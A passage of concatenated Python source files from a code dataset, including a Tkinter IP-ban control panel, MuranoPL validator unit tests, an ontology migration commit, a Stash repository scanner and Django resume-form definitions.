btnTelRu.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n urlTe = urlTelOpt34\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnKom34():\r\n btnKom34.config(fg=\"red\")\r\n btnKomOpt34.config(fg=\"black\")\r\n btnKom39.config(fg=\"black\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomRu34\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKomOpt34():\r\n btnKomOpt34.config(fg=\"red\")\r\n btnKom34.config(fg=\"black\")\r\n btnKom39.config(fg=\"black\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomOpt34\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKom39():\r\n btnKom39.config(fg=\"red\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom34.config(fg=\"black\")\r\n btnKomOpt34.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomRu39\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKomOpt39():\r\n btnKomOpt39.config(fg=\"red\")\r\n btnKom39.config(fg=\"black\")\r\n btnKom34.config(fg=\"black\")\r\n btnKomOpt34.config(fg=\"black\")\r\n btnKom43.config(fg=\"black\")\r\n urlKo = urlKomOpt39\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\ndef click_btnKom43():\r\n btnKom43.config(fg=\"red\")\r\n btnKom39.config(fg=\"black\")\r\n btnKomOpt39.config(fg=\"black\")\r\n btnKom34.config(fg=\"black\")\r\n btnKomOpt34.config(fg=\"black\")\r\n urlKo = urlKomRu43\r\n urlChangeFlag = \"Ko\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlKo)\r\n\r\ndef click_btnLogin():\r\n global inputValue\r\n inputValue = 1\r\n\r\ndef confirmExit():\r\n root.quit()\r\n root.destroy()\r\n\r\ndef scrollTextOut(txt):\r\n console.configure(state='normal') # enable insert\r\n console.insert(END, txt + '\\n')\r\n console.yview(END) # autoscroll\r\n console.configure(state='disabled') # disable editing\r\n\r\ndriver = webdriver.Chrome(executable_path = 'C:\\chromedriver.exe')\r\n# Открыть новую пустую вкладку\r\ndriver.execute_script(\"window.open('','_blank');\")\r\ndriver.execute_script(\"window.open('','_blank');\")\r\n# вернуться на предыдущую вкладку (с индексом 0)\r\ndriver.switch_to.window(driver.window_handles[0])\r\n\r\nt = threading.Thread(target = worker) #start logger\r\nworker_flag = True\r\n#t.start() #start logging thread\r\n\r\nt2 = threading.Thread(target = worker2)\r\nworker2_flag = True\r\n#t2.start()\r\n\r\nclient = paho.Client()\r\nclient.on_message = on_message\r\nclient.connect(broker)\r\nclient.subscribe(Topics)\r\nclient.loop_start()\r\n\r\n#root = Tk()\r\nroot.title(\"банер по IP\")\r\nroot.geometry(\"1200x150+20+800\")\r\n\r\nbtnTel = Button(text=\"Tel\", padx=\"20\", pady=\"8\",command = click_btnTel)\r\nbtnTel.place(x=10, y=5,height=30, width=50)\r\nbtnTelRu = Button(text=\"TelRu\", padx=\"20\", pady=\"8\",command = click_btnTelRu)\r\nbtnTelRu.place(x=70, y=5,height=30, width=50)\r\nbtnTel49 = Button(text=\"Tel49\", padx=\"20\", pady=\"8\",command = click_btnTel49)\r\nbtnTel49.place(x=140, y=5,height=30, width=50)\r\nbtnTelOpt49 = Button(text=\"TelOp49\", padx=\"20\", pady=\"8\",command = click_btnTelOpt49)\r\nbtnTelOpt49.place(x=210, y=5,height=30, width=50)\r\nbtnTel39 = Button(text=\"Tel39\", padx=\"20\", pady=\"8\",command = click_btnTel39)\r\nbtnTel39.place(x=280, y=5,height=30, width=50)\r\nbtnTelOpt39 = Button(text=\"TelOp39\", padx=\"20\", pady=\"8\",command = click_btnTelOpt39)\r\nbtnTelOpt39.place(x=350, y=5,height=30, width=50)\r\nbtnTelOpt34 = Button(text=\"TelOp34\", padx=\"20\", pady=\"8\",command = click_btnTelOpt34)\r\nbtnTelOpt34.place(x=420, y=5,height=30, width=50)\r\nbtnKom34 = Button(text=\"Kom34\", padx=\"20\", pady=\"8\",command = click_btnKom34)\r\nbtnKom34.place(x=490, y=5,height=30, width=50)\r\nbtnKomOpt34 = Button(text=\"KomOp34\", padx=\"20\", pady=\"8\",command = click_btnKomOpt34)\r\nbtnKomOpt34.place(x=560, y=5,height=30, width=50)\r\nbtnKom39 = Button(text=\"Kom39\", padx=\"20\", pady=\"8\",command = click_btnKom39)\r\nbtnKom39.place(x=630, y=5,height=30, width=50)\r\nbtnKomOpt39 = Button(text=\"KomOp39\", padx=\"20\", pady=\"8\",command = click_btnKomOpt39)\r\nbtnKomOpt39.place(x=700, y=5,height=30, width=50)\r\nbtnKom43 = Button(text=\"Kom43\", padx=\"20\", pady=\"8\",command = click_btnKom43)\r\nbtnKom43.place(x=770, y=5,height=30, width=50)\r\nbtnLogin = Button(text=\"Login\", padx=\"20\", pady=\"18\",command = click_btnLogin)\r\nbtnLogin.place(x=870, y=5,height=30, width=50)\r\n\r\nlabelIP = Label(root,text = \"IP\")\r\nlabelIP.place(x=10, y=40)\r\nlabelConsole = Label(root,text = \"Print\")\r\nlabelConsole.place(x=300, y=40)\r\nconsole = scrolledtext.ScrolledText(root, state='disable')\r\nconsole.place(x=10, y=60, width = 1190)\r\n\r\nt.start()\r\nt2.start()\r\nroot.protocol('WM_DELETE_WINDOW', confirmExit)\r\nroot.mainloop()\r\ntry:\r\n while True:\r\n pass\r\n\r\nexcept KeyboardInterrupt:\r\n print(\"interrrupted by keyboard\")\r\n root.destroy()\r\n","sub_path":"Mongo_Find_Repit_Ban_IP_UI.py","file_name":"Mongo_Find_Repit_Ban_IP_UI.py","file_ext":"py","file_size_in_byte":23712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"571633331","text":"# Copyright (c) 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom copy import deepcopy\nimport unittest\nimport yaml\n\nfrom mplcheck.validators.muranopl import MuranoPLValidator\n\n\nMURANOPL_BASE = {\n 'Name': 'Instance',\n 'Namespaces': {\n '=': 'org.openstack.test',\n 'res': 'io.murano.resources',\n 'std': 'io.murano'},\n 'Extends': 'res:LinuxMuranoInstance',\n 'Properties': {\n 'ports': {\n 'Contract': [\n '$.class(NeutronPort).notNull()'],\n 'Default': []}},\n 'Methods': {\n 'prepareStackTemplate': {\n 'Scope': 'Public',\n 'Arguments': {\n 'instanceTemplate': {'Contract': {}}},\n 'Body': [\n {'Do': [\n '$port.deploy()',\n {'$template': {\n 'resources': {\n '$.name': {\n 'properties': {\n 'networks': [\n {'port': '$port.getRef()'}]}}}}},\n {'$instanceTemplate':\n '$instanceTemplate.mergeWith($template)'}],\n 'For': 'port',\n 'In': '$.ports'},\n {'Return': '$instanceTemplate'}]}},\n}\n\n\nclass MuranoPlTests(unittest.TestCase):\n def setUp(self):\n self.mpl_validator = MuranoPLValidator()\n\n def test_success(self):\n mpl = yaml.dump(MURANOPL_BASE)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(0, len(result))\n\n def test_no_name_in_file(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n del mpl_dict['Name']\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(0, len(result))\n\n def test_double_underscored_name(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Name'] = '__Instance'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Invalid class name \"__Instance\"', report.message)\n self.assertEqual(21, report.line)\n self.assertEqual(7, report.column)\n\n def test_not_camel_case_name(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Name'] = 'notcamelcase'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Invalid class name \"notcamelcase\"',\n result[0].message)\n self.assertEqual(21, report.line)\n self.assertEqual(7, report.column)\n\n def test_whitespace_in_name(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Name'] = 'white space'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Invalid class name \"white space\"',\n report.message)\n self.assertEqual(21, report.line)\n self.assertEqual(7, report.column)\n\n def test_properties_usage(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Properties']['ports']['Usage'] = 'OutIn'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Not allowed usage \"OutIn\"',\n report.message)\n self.assertEqual(27, report.line)\n self.assertEqual(12, report.column)\n\n def test_wrong_type_namespace(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Namespaces'] = [1, 2, 3]\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Wrong type of namespace',\n report.message)\n self.assertEqual(22, report.line)\n self.assertEqual(13, report.column)\n\n def test_wrong_method_scope(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Methods']['prepareStackTemplate']['Scope'] = 'Wrong'\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Wrong Scope \"Wrong\"',\n report.message)\n self.assertEqual(4, report.line)\n self.assertEqual(5, report.column)\n\n def test_dict_in_body(self):\n mpl_dict = deepcopy(MURANOPL_BASE)\n mpl_dict['Methods']['prepareStackTemplate']['Body'] = {'a': 'b'}\n mpl = yaml.dump(mpl_dict)\n self.mpl_validator.parse(mpl)\n result = [r for r in self.mpl_validator.validate()]\n self.assertEqual(1, len(result))\n report = result[0]\n self.assertIn('Body is not a list or scalar/yaql expression',\n report.message)\n self.assertEqual(7, report.line)\n self.assertEqual(11, report.column)\n","sub_path":"mplcheck/tests/test_muranopl_validator.py","file_name":"test_muranopl_validator.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"405025229","text":"# Copyright (c) 2021, Galois, Inc.\n#\n# All Rights Reserved\n#\n# This material is based upon work supported by the Defense Advanced Research\n# Projects Agency (DARPA) under Contract No. FA8750-20-C-0203.\n#\n# Any opinions, findings and conclusions or recommendations expressed in this\n# material are those of the author(s) and do not necessarily reflect the views\n# of the Defense Advanced Research Projects Agency (DARPA).\n\nfrom migration_helpers.name_space import rack\nfrom ontology_changes import (\n AtMost,\n ChangeCardinality,\n ChangePropertyIsATypeOf,\n ChangePropertyRange,\n Commit,\n RenameProperty,\n SingleValue,\n)\n\nFILE = rack(\"FILE\")\nPROV_S = rack(\"PROV-S\")\nSOFTWARE = rack(\"SOFTWARE\")\n\ncommit = Commit(\n number=\"643839e7d8036731ba1da767942c8e74c2876e2e\",\n changes=[\n # FILE.sadl\n ChangeCardinality(\n name_space=FILE,\n class_id=\"FILE\",\n property_id=\"filename\",\n to_cardinality=SingleValue(),\n ),\n RenameProperty(\n from_name_space=FILE,\n from_class=\"FILE\",\n from_name=\"fileParent\",\n to_name_space=FILE,\n to_class=\"FILE\",\n to_name=\"definedIn\",\n ),\n ChangePropertyIsATypeOf(\n name_space=FILE,\n class_id=\"FILE\",\n property_id=\"satisfies\",\n from_name_space=PROV_S,\n from_property_id=\"wasDerivedFrom\",\n to_name_space=PROV_S,\n to_property_id=\"wasImpactedBy\",\n ),\n ChangeCardinality(\n name_space=FILE,\n class_id=\"FILE\",\n property_id=\"createBy\",\n to_cardinality=AtMost(1),\n ),\n # FILE.sadl / SOFTWARE.sadl\n RenameProperty(\n from_name_space=SOFTWARE,\n from_class=\"FILE\",\n from_name=\"definedIn\",\n to_name_space=FILE,\n to_class=\"FILE\",\n to_name=\"definedIn\",\n ),\n ChangePropertyRange(\n prop_name_space=FILE,\n prop_name=\"definedIn\",\n from_name_space=PROV_S,\n from_range=\"ENTITY\",\n to_name_space=FILE,\n to_range=\"FILE\",\n ),\n ],\n)\n","sub_path":"migration/rack/commits/commit643839e7d8036731ba1da767942c8e74c2876e2e.py","file_name":"commit643839e7d8036731ba1da767942c8e74c2876e2e.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"328194660","text":"from server.repo.stashaccesser import StashAccesser\nimport json\nimport os\n\nclass RepoSelector(object):\n\tdef __init__(self):\n\t\tself.accesser = StashAccesser()\n\t\tself.file_path = os.path.dirname(__file__)\n\t\tself.config = json.load(open(os.path.join(self.file_path, '..\\\\config\\\\repos.json')))\n\n\tdef _is_updated_repo(self, repo):\n\t\tcommit = self.accesser.last_commit(repo['project']['key'], repo['slug'])\n\t\tif commit == None:\n\t\t\treturn False\n\t\tif (repo['slug'] not in self.config) or (self.config[repo['slug']] != commit['id']):\n\t\t\tself.config[repo['slug']] = commit['id']\n\t\t\treturn True\n\t\treturn False\n\n\tdef _is_front_end_repo(self, repo):\n\t\tfiles = self.accesser.files(repo['project']['key'], repo['slug'])\n\t\treturn 'package.json' in files;\n\n\tdef _save(self):\n\t\tjson.dump(self.config, open(os.path.join(self.file_path, '..\\\\config\\\\repos.json'), 'w'))\n\n\tdef front_end_repos(self):\n\t\tself.accesser.login()\n\t\trepos = self.accesser.repos()\n\t\tresult = []\n\t\tfor repo in repos:\n\t\t\tprint(\"Start:\" + repo['slug'])\n\t\t\tif self._is_updated_repo(repo) and self._is_front_end_repo(repo):\n\t\t\t\tprint(repo['project']['key'] + ': ' + repo['slug'])\n\t\t\t\tresult.append(repo)\n\t\t\tprint(\"End:\" + repo['slug'])\n\t\tprint('fer done.')\n\t\tself._save()\n\nif __name__ == \"__main__\":\n\tselector = RepoSelector()\n\tselector.front_end_repos()\n\tprint('End')","sub_path":"server/repo/reposelector.py","file_name":"reposelector.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389332871","text":"from crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Submit, Button, Div\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.forms import ModelForm, Textarea\nfrom suit_redactor.widgets import RedactorWidget\nfrom employees.constants import *\nfrom employees.models import Resume, Education, WorkExperience, Project, Certification, Skill, TrainingExperience, \\\n IdCard, Card, ContactPerson, Salary, WorkProject, RegularMeeting, DailyReport, Student\n\n\nclass LoginForm(AuthenticationForm):\n def __init__(self, request, *args, **kwargs):\n super(LoginForm, self).__init__(request, *args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.form_method = 'post'\n self.helper.form_action = 'login'\n\n self.helper.field_template = 'bootstrap4/layout/inline_field.html'\n self.helper.layout = Layout(\n 'username',\n 'password',\n Submit('submit', 'Submit', css_class='btn-block')\n )\n\n\nclass ResumeForm(ModelForm):\n class Meta:\n model = Resume\n fields = ['gender', 'native_place', 'nationality', 'birth_date', 'marital_status',\n 'target_position', 'expect_salary', 'expect_salary_intern',\n 'telephone', 'email', 'qq', 'wechat',\n 'english_level', 'english_score',\n 'height', 'weight',\n 'introduction']\n widgets = {\n 'introduction': Textarea(attrs={'rows': 3})\n }\n\n def __init__(self, *args, **kwargs):\n super(ResumeForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_resume'\n self.helper.layout = Layout(\n Div(\n Div('gender', css_class='col-xs-2'),\n Div('native_place', css_class='col-xs-2'),\n Div('nationality', css_class='col-xs-2'),\n Div('birth_date', css_class='col-xs-2'),\n Div('height', css_class='col-xs-2'),\n Div('weight', css_class='col-xs-2'),\n css_class='row'\n ),\n Div(\n Div('telephone', css_class='col-xs-3'),\n Div('email', css_class='col-xs-3'),\n Div('qq', css_class='col-xs-3'),\n Div('wechat', css_class='col-xs-3'),\n css_class='row'\n ),\n Div(\n Div('english_level', css_class='col-xs-4'),\n Div('english_score', css_class='col-xs-4'),\n Div('marital_status', css_class='col-xs-4'),\n css_class='row'\n ),\n Div(\n Div('target_position', css_class='col-xs-4'),\n Div('expect_salary', css_class='col-xs-4'),\n Div('expect_salary_intern', css_class='col-xs-4'),\n\n ),\n Div(\n Div('introduction', css_class='col-xs-12'),\n css_class='row'\n )\n )\n\n\nclass EducationFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(EducationFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('school', css_class='col-md-8'),\n Div('major', css_class='col-md-4'),\n css_class='row'\n ),\n Div(\n Div('education', css_class='col-md-3'),\n Div('education_type', css_class='col-md-3'),\n Div('start_date', css_class='col-md-3'),\n Div('end_date', css_class='col-md-3'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=EDUCATION_FORMS_PREFIX)\n\n\nclass EducationForm(ModelForm):\n class Meta:\n model = Education\n fields = ['school', 'major', 'education', 'education_type', 'start_date', 'end_date']\n\n def __init__(self, *args, **kwargs):\n super(EducationForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_education'\n self.helper.layout = Layout(\n Div(\n Div('school', css_class='col-xs-5'),\n Div('major', css_class='col-xs-5'),\n Div('education', css_class='col-xs-5'),\n Div('education_type', css_class='col-xs-5'),\n Div('start_date', css_class='col-xs-5'),\n Div('end_date', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass WorkExperienceFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(WorkExperienceFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('company_name', css_class='col-md-5'),\n Div('position', css_class='col-md-3'),\n Div('start_date', css_class='col-md-2'),\n Div('end_date', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('resignation_reason', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('description', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=WORK_EXPERIENCE_FORMS_PREFIX)\n\n\nclass WorkExperienceForm(ModelForm):\n class Meta:\n model = WorkExperience\n exclude = ['user']\n widgets = {\n 'description': Textarea(attrs={'rows': 3})\n }\n\n def __init__(self, *args, **kwargs):\n super(WorkExperienceForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_workexperience'\n self.helper.layout = Layout(\n Div(\n Div('company_name', css_class='col-xs-5'),\n Div('position', css_class='col-xs-5'),\n Div('description', css_class='col-xs-5'),\n Div('resignation_reason', css_class='col-xs-5'),\n Div('start_date', css_class='col-xs-5'),\n Div('end_date', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass ProjectFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(ProjectFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-8'),\n Div('start_date', css_class='col-md-2'),\n Div('end_date', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('technology', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('description', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('responsibility', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=PROJECT_FORMS_PREFIX)\n\n\nclass ProjectForm(ModelForm):\n class Meta:\n model = Project\n exclude = ['user']\n widgets = {\n 'technology': Textarea(attrs={'rows': 3}),\n 'description': Textarea(attrs={'rows': 3}),\n 'responsibility': Textarea(attrs={'rows': 3}),\n }\n\n\nclass CertificationFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(CertificationFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-6'),\n Div('remark', css_class='col-md-6'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=CERTIFICATION_FORMS_PREFIX)\n\n\nclass CertificationForm(ModelForm):\n class Meta:\n model = Certification\n exclude = ['user']\n\n def __init__(self, *args, **kwargs):\n super(CertificationForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_certification'\n self.helper.layout = Layout(\n Div(\n Div('name', css_class='col-xs-5'),\n Div('remark', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass SkillFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(SkillFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('level', css_class='col-md-2'),\n Div('content', css_class='col-md-10'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=SKILL_FORMS_PREFIX)\n\n\nclass SkillForm(ModelForm):\n class Meta:\n model = Skill\n exclude = ['user']\n\n def __init__(self, *args, **kwargs):\n super(SkillForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_skill'\n self.helper.layout = Layout(\n Div(\n Div('level', css_class='col-xs-5'),\n Div('content', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass TrainingExperienceFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(TrainingExperienceFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-4'),\n Div('organization_name', css_class='col-md-4'),\n Div('start_date', css_class='col-md-2'),\n Div('end_date', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('content', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=TRAINING_EXPERIENCE_FORMS_PREFIX)\n\n\nclass TrainingExperienceForm(ModelForm):\n class Meta:\n model = TrainingExperience\n exclude = ['user']\n widgets = {\n 'content': Textarea(attrs={'rows': '3'})\n }\n\n def __init__(self, *args, **kwargs):\n super(TrainingExperienceForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_training'\n self.helper.layout = Layout(\n Div(\n Div('name', css_class='col-xs-5'),\n Div('organization_name', css_class='col-xs-5'),\n Div('start_date', css_class='col-xs-5'),\n Div('end_date', css_class='col-xs-5'),\n Div('content', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n\nclass IdCardForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super(IdCardForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(\n Div(\n Div('id_card_number', css_class='col-md-6'),\n Div('id_card_address', css_class='col-md-6'),\n css_class='row'\n ),\n Div(\n Div('residence_address', css_class='col-md-6'),\n Div('id_card_photo', css_class='col-md-6'),\n css_class='row'\n ),\n )\n\n class Meta:\n model = IdCard\n exclude = ['user']\n\n\nclass CardFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(CardFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('number', css_class='col-md-6'),\n Div('bank_name', css_class='col-md-6'),\n css_class='row'\n ),\n Div(\n Div('branch_name', css_class='col-md-6'),\n Div('phone', css_class='col-md-6'),\n css_class='row'\n ),\n Div(Div('is_default', css_class='col-md-12'), css_class='row'),\n Div(Div('remark', css_class='col-md-12'), css_class='row'),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=CARD_FORMS_PREFIX)\n\n\nclass CardForm(ModelForm):\n class Meta:\n model = Card\n exclude = ['user']\n widgets = {\n 'remark': Textarea(attrs={'rows': '3'})\n }\n\n\nclass ContactFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(ContactFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-3'),\n Div('relationship', css_class='col-md-3'),\n Div('organization', css_class='col-md-3'),\n Div('telephone', css_class='col-md-3'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=CONTACT_FORMS_PREFIX)\n\n\nclass ContactForm(ModelForm):\n class Meta:\n model = ContactPerson\n exclude = ['user']\n\n\nclass WorkProjectFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(WorkProjectFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('name', css_class='col-md-8'),\n Div('start_time', css_class='col-md-2'),\n Div('end_time', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('key_skill', css_class='col-md-12'),\n css_class='row'\n ),\n Div(\n Div('description', css_class='col-md-12'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden='true'\n )\n )\n self.all().wrap_together(Div, css_class=PROJROM_FORMS_PREFIX)\n\n\nclass WorkProjectForm(ModelForm):\n class Meta:\n model = WorkProject\n fields = ('name', 'description', 'key_skill', 'start_time', 'end_time')\n # widgets = {\n # 'key_skill': Textarea(attrs={'rows': 3}),\n # 'description': Textarea(attrs={'rows': 3}),\n # }\n\n\nclass SalaryFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(SalaryFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('salary_level', css_class='col-md-4'),\n Div('salary_proportion', css_class='col-md-4'),\n Div('actual_salary', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('gross_salary', css_class='col-md-2', function='jisuan'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=SALARY_FORMS_PREFIX)\n\n\nclass SalaryForm(ModelForm):\n class Meta:\n model = Salary\n exclude = ['user']\n widgets = {\n 'gross_salary': Textarea(attrs={'readonly': 'readonly', 'onblur': ''}),\n }\n\n\nclass DailyReportFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(DailyReportFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('header', css_class='col-md-4'),\n Div('create_time', css_class='col-md-4'),\n css_class='row'\n ),\n Div(\n Div('report_content', css_class='col-md-2'),\n Div('assess', css_class='col-md-4'),\n css_class='row'\n ),\n Div(\n Div('score', css_class='col-md-2'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=DAILYREPORT_FORMS_PREFIX)\n\n\nclass 